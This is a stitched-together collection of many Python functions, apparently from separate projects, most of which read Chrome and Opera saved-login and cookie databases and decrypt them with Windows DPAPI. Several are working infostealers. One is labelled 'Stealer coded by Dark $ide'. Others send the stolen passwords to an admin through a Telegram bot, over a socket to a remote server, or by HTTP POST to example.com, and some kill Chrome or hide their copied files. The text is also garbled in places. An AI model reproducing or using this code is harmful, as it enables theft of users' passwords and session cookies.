def pluck_passwords(self): PATH = 'C:/Users/{}/AppData/Local/Google/Chrome/User Data/Default/Login Data'.format( os.getlogin()) # Copies the chrome database over to the temporary directory. copy(PATH, gettempdir()) # SQLite Connection conn = sqlite3.connect(gettempdir() + '//Login Data') cur = conn.cursor() user_data = None try: cur.execute( 'SELECT action_url, username_value, password_value FROM logins' ) user_data = cur.fetchall() except Exception: print('\nError fetching passwords.') for r in user_data: password = win32crypt.CryptUnprotectData(r[2], None, None, None, 0)[1] password = password.decode("utf-8") username = r[1] host = r[0] # Creates a string for each website / username / password combination result = '{0}\n\t{1}\n\t{2}\n\n'.format(host, username, password) # Adds each result to the payload, ready to be uploaded. self.payload += result
def get_cookies(cookies_db_path, host_key, aes_gcm_key): """Get the cookies for the specified host_key from Chrome Cookies sqlite database.""" cookies = [] with tempfile.TemporaryDirectory(prefix="twitchget_") as temp_dir: # Copy the cookies database to avoid hitting a lock and open cookies_db_copy_path = shutil.copy(cookies_db_path, temp_dir) db = sqlite3.connect(cookies_db_copy_path) query = "SELECT name, path, expires_utc, is_secure, encrypted_value "\ "FROM cookies WHERE host_key=?" cursor = db.cursor() cursor.execute(query, (host_key, )) for result in cursor.fetchall(): name, path, expiry, secure, ev = result # Skip cookies that are blacklisted by name or session-only if name in COOKIES_BLACKLIST or expiry == 0: continue # Decrypt the cookie value if ev.startswith(b"v10"): nonce, cipertext = ev[3:15], ev[15:] aes_gcm = AESGCM(aes_gcm_key) dv = aes_gcm.decrypt(nonce, cipertext, None).decode("utf-8") else: dv = win32crypt.CryptUnprotectData(ev, None, None, None, 0)[1].decode("utf-8") cookies.append((name, path, expiry, secure, dv)) # Close the database cleanly db.close() return cookies
def decrypt_password(password, key): iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
def _decrypt(self, value, encrypted_value, key): """Decrypt encoded cookies """ if (sys.platform == 'darwin') or sys.platform.startswith('linux'): if value or (encrypted_value[:3] != b'v10'): return value # Encrypted cookies should be prefixed with 'v10' according to the # Chromium code. Strip it off. encrypted_value = encrypted_value[3:] # Strip padding by taking off number indicated by padding # eg if last is '\x0e' then ord('\x0e') == 14, so take off 14. def clean(x): last = x[-1] if isinstance(last, int): return x[:-last].decode('utf8') else: return x[:-ord(last)].decode('utf8') iv = b' ' * 16 cipher = AES.new(key, AES.MODE_CBC, IV=iv) decrypted = cipher.decrypt(encrypted_value) return clean(decrypted) else: # Must be win32 (on win32, all chrome cookies are encrypted) try: import win32crypt except ImportError: raise BrowserCookieError( 'win32crypt must be available to decrypt Chrome cookie on Windows' ) return win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode("utf-8")
def get_chrome(): #close the chrome browser os.system("taskkill /im chrome.exe /f") #Locate "Login Data" file where all passwords are saved data_path = os.path.expanduser( '~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data' c = sqlite3.connect(data_path) cursor = c.cursor() #Select URL, UserName, Pwds from logins table select_stmt = "SELECT origin_url,username_value,password_value FROM logins" cursor.execute(select_stmt) login_data = cursor.fetchall() cursor.close() cred = {} pwds = {} #Decode saved passwords for url, user_name, pwd in login_data: pwd = win32crypt.CryptUnprotectData(pwd) cred[url] = (user_name, pwd[1].decode('utf8')) #Save it to text file "pwds.txt" with open('passwords.txt', 'a') as f: for i, j in cred.items(): if j[1] != '' and j[0] != '': i1 = i.split('/') pwds[i1[2]] = (j[0], j[1]) #sort according to URL in assending for j in sorted(pwds): f.write("{0:<35}{1:<35}{2:<15}\n".format(j, pwds[j][0], pwds[j][1]))
def get_chrome(): data_path = os.path.expanduser( '~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data' x = open(data_path, 'rb') z = x.read() x.close() f = open('logininfo', 'wb') f.write(z) f.close() c = sqlite3.connect('logininfo') cursor = c.cursor() select_statement = 'SELECT origin_url, username_value, password_value FROM logins' cursor.execute(select_statement) login_data = cursor.fetchall() cred = {} string = '' for url, user_name, pwd in login_data: pwd = win32crypt.CryptUnprotectData(pwd) cred[url] = user_name, pwd[1].decode('utf8') string += '\n[+] URL: %s \n USERNAME:%s \n PASSWORD:%s\n' % ( url, user_name, pwd[1].decode('utf8')) print(string) a = open('loginids.txt', 'a') a.write(string) a.close()
def getChromePasswords(): info_list = [] path = getPath() try: connection = sqlite3.connect(path + 'Login Data') with connection: cursor = connection.cursor() v = cursor.execute( 'SELECT action_url, username_value, password_value FROM logins' ) value = v.fetchall() for website_url, username, password in value: if os.name == 'nt': password = win32crypt.CryptUnprotectData( password, None, None, None, 0)[1] if password: info_list.append({ 'website_url': website_url, 'username': username, 'password': str(password) }) return info_list except Exception as e: return [{ "error": str(e) }, { "Problem": "User doesn't use Google Chrome or isn't using Windows" }]
def getCookieTotxt(host, filename): #1.第一步从本地浏览器COOKIES数据库读取数据 cookiepath = os.environ[ 'LOCALAPPDATA'] + r"\Google\Chrome\User Data\Default\Cookies" sql = "select name,encrypted_value from cookies where host_key like '%s'" % host cookie_list = [] split_str = "; " with sqlite3.connect(cookiepath) as conn: cu = conn.cursor() for name, encrypted_value in cu.execute(sql).fetchall(): cookie_list.append( name + "=" + win32crypt.CryptUnprotectData(encrypted_value)[1].decode()) str_cookies = split_str.join(cookie_list) print(str_cookies) with open(filename, 'w') as f: print(str_cookies, file=f) #运行环境windows 2012 server python3.4 x64 chrome 50 #以下是测试代码 #Getcookies.getcookiefromchrome('www.fjetc.com','etc_cookie.txt') #Getcookies.saveCookieTotxt('%pss.txffp.com','cookies.txt') #Getcookies.getCookieTotxt('%pss.txffp.com','cookies.txt') #设置allow_redirects为真 #r=requests.get(url,headers=httphead,cookies=getcookiefromchrome('pss.txffp.com'),allow_redirects=1) #print(r.text)
def decrypt(path, save_path): if not os.path.isfile(path): print 'The file doesn\'t exist!' return connChrome = sqlite3.connect(path) cursor = connChrome.cursor() try: cursor.execute('SELECT action_url, username_value, password_value FROM logins') except: print 'Impossible to read ' + path return print '\t\t\t*** Passwords ***' for query in cursor.fetchall(): passwd = win32crypt.CryptUnprotectData(query[2], None, None, None, 0)[1] if passwd: print 'URL: ' + query[0] print 'User: '******'Password: '******'--------------------' if save_path != '': passwordsFile = open(save_path, 'a') passwordsFile.writelines('URL: ' + query[0] + '\nUser: '******'\nPassword: '******'\n--------------------\n') passwordsFile.close()
def dumpPass(): # LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local path = getenv( "LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login Data" path2 = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login2" copyfile(path, path2) conn = sqlite3.connect(path2) # Connect to the copied Database cursor = conn.cursor( ) # Create a Cursor object and call its execute() method to perform SQL commands like SELECT # SELECT column_name,column_name FROM table_name # SELECT action_url and username_value and password_value FROM table logins cursor.execute( 'SELECT action_url, username_value, password_value FROM logins') User_Pass = list() # To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows. for raw in cursor.fetchall(): # print raw[0] + '\n' + raw[1] # print the action_url (raw[0]) and print the username_value (raw[1]) password = win32crypt.CryptUnprotectData( raw[2] )[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it # print password # print the password in clear text User_Pass.append(raw[0] + ' ' + raw[1] + ' ' + password) conn.close() return User_Pass
def getSaveChromePW(): #path to user's login data data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default" login_db = os.path.join(data_path, 'Login Data') #db connect and query c = sqlite3.connect(login_db) cursor = c.cursor() select_statement = "SELECT origin_url, username_value, password_value FROM logins" cursor.execute(select_statement) login_data = cursor.fetchall() #URL: credentials dictionary credential = {} #decrytping the password for url, user_name, pwd, in login_data: pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #This returns a tuple description and the password credential[url] = (user_name, pwd[1]) #writing to a text file (CAUTION: Don't leave this text file around!) prompt = 'y' if prompt == 'y': with open('pwd.txt', 'w') as f: for url, credentials in credential.iteritems(): if credentials[1]: f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n") else: f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n") print "[.] Successfully written to pwd.txt!" else: quit()
def start(self): #Retriving Password Hash From Database File c = sqlite3.connect(self.login_db) cursor = c.cursor() select_statement = "SELECT origin_url, username_value, password_value FROM logins" cursor.execute(select_statement) login_data = cursor.fetchall() credentials_dict = {} #Decrypting password for url, user_name, pwd, in login_data: pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #Tuple credentials_dict[url] = (user_name, pwd[1]) #Iterating Each Creds and Storing it in "self.result" for url, credentials in six.iteritems(credentials_dict): if credentials[1]: self.result += "\n\nURL : " + url self.result += "\nUsername : "******"\nPassword : "******"\n\nURL : " + url self.result += "\nUsername : NOT FOUND" self.result += "\nPassword : NOT FOUND" return self.result
def chrome(): textc = "\n CHROME COOKIES " try: if os.path.exists( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'): shutil.copy2( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2') conn = sqlite3.connect( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2') cursor = conn.cursor() cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;') for result in cursor.fetchall(): cookies = win32crypt.CryptUnprotectData(result[0], None, None, None, 0)[1] if cookies: textc = textc + "\n" + "url: " + result[ 1] + " | name: " + result[ 2] + " | data: " + cookies.decode("utf-8") except: return "no chrome" #print(textc) return (textc)
def opera(): texto = "\n OPERA COOKIES " try: if os.path.exists( os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Cookies'): shutil.copy2( os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Cookies', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Cookies2') conn = sqlite3.connect( os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Cookies2') cursor = conn.cursor() cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;') for result in cursor.fetchall(): cookies = win32crypt.CryptUnprotectData(result[0], None, None, None, 0)[1] if cookies: texto = texto + "\n" + "url: " + result[ 1] + " | name: " + result[ 2] + " | data: " + cookies.decode("utf-8") except: return "no opera" #print(texto) return (texto)
def get(self): if self.caller.ignore_policy != "1": policy_value = self.get_from_policy(log=False) if policy_value != None: logger.debug("Reading %s from group policy settings" % self.name) return policy_value ini_value = self.get_from_ini(log=False) if ini_value != None: ini_value = re.sub(r'^"|"$', '', ini_value) # remove possible quotes logger.debug("Reading %s from ini file" % self.name) self.passwordtype = ini_value.split(":")[0] value = ":".join(ini_value.split(":")[1:]) if self.passwordtype == "clear": # Encrypt the password self.set(value) return value elif self.passwordtype == "crypt": #Remove base_64 if value[-1] == "#": # If an extra # has been added to the hash to force quoting encrypted_password = base64.b64decode(value[:-1]) # Remove hash at end else: encrypted_password = base64.b64decode(value) password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1] return password else: raise WpkgConfigError("The password type %s is invalid, provide either 'clear:password' or 'crypt:encryptedpassword'" % self.passwordtype) else: return None
def LDParser(self): conn = sqlite3.connect( os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data") cursor = conn.cursor() cursor.execute( 'SELECT action_url, username_value, password_value FROM logins') output_file_path = 'ChromeCode/ChromeLoginData' with open(output_file_path, 'wb') as output_file: csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL) headers = [] csv_writer.writerow(headers) for result in cursor.fetchall(): password = win32crypt.CryptUnprotectData( result[2], None, None, None, 0)[1] if password: print 'Site: ' + result[0] print 'Username: '******'Password: '******'Site', result[0]) + ("\n" 'Username', result[1]) + ("\n" 'Password', password)) csv_writer.writerow(Final_list)
def getcachedpass(): # Close all chrome tabs os.system("taskkill /F /IM chrome.exe") # Connect to sqlite database conn = sqlite3.connect(path) cursor = conn.cursor() # Read login data from cache cursor.execute( 'Select action_url, username_value, password_value FROM logins') urls = [] usrs = [] pwds = [] for result in cursor.fetchall(): password = str( win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1])[2:-1] if password != "" and result[1] != "": urls.append(result[0]) usrs.append(result[1]) pwds.append(password) return (urls, usrs, pwds)
def _getchromekey(self, browser): # Newer versions of Chrome generate a key to encrypt the user passwords with. # Chrome encrypts THAT password on Windows using the Windows DPAPI and then # base64 encodes it to store in the browser state file. chromekey = None try: state = browser["state"] encrypted_key = state["os_crypt"]["encrypted_key"] encrypted_key = base64.b64decode(encrypted_key) if encrypted_key.startswith(ChromiumScanner.CHROME_DPAPI_PREFIX): # Decrypt the key using Windows encryption # This will not work if the user's password was changed by an # administrator. chromekey = win32crypt.CryptUnprotectData(encrypted_key[len(ChromiumScanner.CHROME_DPAPI_PREFIX):])[1] else: chromekey = encrypted_key # Just in case we might want this key later.. lets save it. # Only time wecan get it is now if it was encrypted with DPAPI binfile = os.path.join(browser["staging_dir"], "chromekey.bin") with open(binfile, "wb") as f: f.write(chromekey) except: print(" [*] Chromium encryption key not found or not usable; maybe older version") browser["chromekey"] = chromekey return chromekey
def __key_extract(self) -> bytes: """Extracts AES key for the new crypto method introduced in Google Chrome V80.""" with open(os.path.join(self.base_dir + 'Local State'), 'rb') as key_file_raw: key_file_json = json.loads(key_file_raw.read()) key_base64 = key_file_json["os_crypt"]["encrypted_key"] key_protected = base64.b64decode(key_base64)[5:] # [5:] removes header return win32crypt.CryptUnprotectData(key_protected, None, None, None, 0)[1] # Removing Windows' key protection
def main(): path = getenv( 'APPDATA' ) + '\..\Local\Google\Chrome\User Data\Default\Login Data' #change as required if not os.path.isfile(path): print '[!] Login Data file not found!\n' quit() print '[!] Connecting to %s' % path # Connect to the database file try: con = sqlite3.connect(path) print '[!] Connected. Decrypting passwords...\n' except Exception as e: print e # Get the data curs = con.cursor() curs.execute( 'SELECT action_url, username_value, password_value FROM logins') for result in curs.fetchall(): # Decrypt the Password site_name = result[0] user_id = result[1] password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: print 'Site: ' + site_name print 'Username: '******'Password: '******'\n' print '[!] Done!\n'
def psw(m): bot.send_message(admin, 'wait') #path to user's login data data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default" login_db = os.path.join(data_path, 'Login Data') #db connect and query c = sqlite3.connect(login_db) cursor = c.cursor() select_statement = "SELECT origin_url, username_value, password_value FROM logins" cursor.execute(select_statement) login_data = cursor.fetchall() #URL: credentials dictionary credential = {} #decrytping the password for url, user_name, pwd, in login_data: pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) credential[url] = (user_name, pwd[1]) with open('pwd.txt', 'w') as f: for url, credentials in credential.iteritems(): if credentials[1]: f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n") else: f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n") psw = open('pwd.txt', 'rb') bot.send_document(admin, psw)
def get_saved_password(name): r"""Retrieve previously saved password. The password is returned unencrypted. *name* is used to lookup a password on this machine, which must be the same *name* used in :py:func:`.save_password`.""" try: # Only import pywin32 dependency if user creates a project # that requires encrypted password. import win32crypt except ImportError: raise DistutilsModuleError("system missing required win32api " "module. You can download from " "http://sourceforge.net/projects.pywin32") try: # retrieve value from user's private registry with _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, "SOFTWARE\\signet") as key: enc = _winreg.QueryValue(key, name) enc = base64.b64decode(enc) # decrypt password using DPAPI (CRYPTPROECT_LOCAL_MACHINE) return win32crypt.CryptUnprotectData(enc, None, None, None, 4)[1] except (WindowsError, IndexError): return None
def Opera_cockie(): textoc = 'coded by romarakhlin\n\n\nCookies Opera:' + '\n' textoc += 'URL | COOKIE | COOKIE NAME' + '\n' if os.path.exists( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'): shutil.copy2( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2') conn = sqlite3.connect( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2') cursor = conn.cursor() cursor.execute("SELECT * from cookies") for result in cursor.fetchall(): cookie = win32crypt.CryptUnprotectData(result[12])[1].decode() name = result[2] url = result[1] textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n' return textoc file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+") file.write(str(Opera_c()) + '\n') file.close()
def _decrypt(self, value, encrypted_value): """Decrypt encoded cookies """ # decryption different for windows. Use windows unprotect data if sys.platform == 'win32': try: decrypted = win32crypt.CryptUnprotectData( encrypted_value, None, None, None, 0)[1] except: decrypted = "<encrypted>" return decrypted else: if value or (encrypted_value[:3] != b'v10'): return value # Encrypted cookies should be prefixed with 'v10' according to the # Chromium code. Strip it off. encrypted_value = encrypted_value[3:] # Strip padding by taking off number indicated by padding # eg if last is '\x0e' then ord('\x0e') == 14, so take off 14. # You'll need to change this function to use ord() for python2. def clean(x): return x[:-ord(x[-1])].decode('utf8') iv = b' ' * 16 cipher = AES.new(self.key, AES.MODE_CBC, IV=iv) decrypted = cipher.decrypt(encrypted_value) return clean(decrypted)
def decipher_new_version(self, path): database_path = path + os.sep + 'Login Data' if os.path.exists(database_path): # Connect to the Database conn = sqlite3.connect(database_path) cursor = conn.cursor() # Get the results try: cursor.execute( 'SELECT action_url, username_value, password_value FROM logins' ) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug( 'ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !' ) return pwdFound = [] for result in cursor.fetchall(): values = {} # Decrypt the Password password = win32crypt.CryptUnprotectData( result[2], None, None, None, 0)[1] if password: values['URL'] = result[0] values['Login'] = result[1] values['Password'] = password pwdFound.append(values) return pwdFound
def get_passwd(path=None): if path == None: data_path = os.path.expanduser( '~') + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default" files = os.listdir(data_path) passwd_path = os.path.join(data_path, 'Login Data') else: passwd_path = path # fetch data statement = 'select username_value, password_value, origin_url from logins;' datas = get_data(passwd_path, statement) print("Username|Password|Site") for data in datas: name = data[0] site = data[2] password_hash = data[1] try: password = win32crypt.CryptUnprotectData(password_hash, None, None, None, 0) password = password[1].decode("gbk") except: print('[*]One hash failed -- try next> Site: {} User: {}'.format( site, name)) password = "" print("{}|{}|{}".format(name, password, site))
def chrpass(): # legal purposes only! strPath = APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data" if not os.path.isfile(APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"): objSocket.send(str.encode("noexist")) return conn = sqlite3.connect(strPath) # connect to database objCursor = conn.cursor() try: objCursor.execute("Select action_url, username_value, password_value FROM logins") # look for credentials except: # if the chrome is open objSocket.send(str.encode("error")) strServerResponse = decode_utf8(objSocket.recv(1024)) if strServerResponse == "close": # if the user wants to close the browser subprocess.Popen(["taskkill", "/f", "/im", "chrome.exe"], shell=True) return strResults = "Chrome Saved Passwords:" + "\n" for result in objCursor.fetchall(): # get data as raw text from sql db password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: strResults += "Site: " + result[0] + "\n" + "Username: "******"\n" + "Password: " \ + decode_utf8(password) strBuffer = str(len(strResults)) objSocket.send(str.encode(strBuffer)) # send buffer time.sleep(0.2) objSocket.send(str.encode(strResults))
def Chrome(): text = 'Stealer coded by Dark $ide\n\n\nPasswords Chrome:' + '\n' text += 'URL | LOGIN | PASSWORD' + '\n' if os.path.exists( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): shutil.copy2( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') conn = sqlite3.connect( os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') cursor = conn.cursor() cursor.execute( 'SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = win32crypt.CryptUnprotectData(result[2])[1].decode() login = result[1] url = result[0] if password != '': text += url + ' | ' + login + ' | ' + password + '\n' return text
def steal_passwords(): path = get_path() try: connection = sqlite3.connect(path + "Login Data") with connection: cursor = connection.cursor() v = cursor.execute( 'SELECT action_url, username_value, password_value FROM logins' ) value = v.fetchall() for information in value: password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1] if password: params = json.dumps({ 'origin_url': information[0], 'username': information[1], 'password': str(password) }).encode('utf8') credentials = base64.b64encode(b'user:pass') req = request.Request("http://www.example.com/restpoint", data=params, headers={ 'content-type': 'application/json', 'Authorization': 'Basic %s' % credentials }) request.urlopen(req) except sqlite3.OperationalError as e: sys.exit(0)
def stage_1(): #Extract the database of chrome passwords from the route shutil.copy( getenv("APPDATA") + r"\..\Local\Google\Chrome\User Data\Default\Login Data", 'LoginData.db') #Hide the copied database from user eyes subprocess.check_call(["attrib", "+H", "LoginData.db"]) #Waits for database to be copied time.sleep(2) conn = sqlite3.connect("LoginData.db") filename = "stage1.txt" cursor = conn.cursor() myfile = open(filename, 'w') subprocess.check_call(["attrib", "+H", filename]) cursor.execute( 'SELECT action_url, username_value, password_value FROM logins') #Decrypts database for result in cursor.fetchall(): try: password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] url = result[0] username = result[1] if password: myfile.write("{: <70}".format(url) + "{: <70}".format(username) + "{: <70}".format(password.decode('utf-8')) + "\n") except: pass myfile.close() conn.close() os.remove('LoginData.db') #Remove the copyed database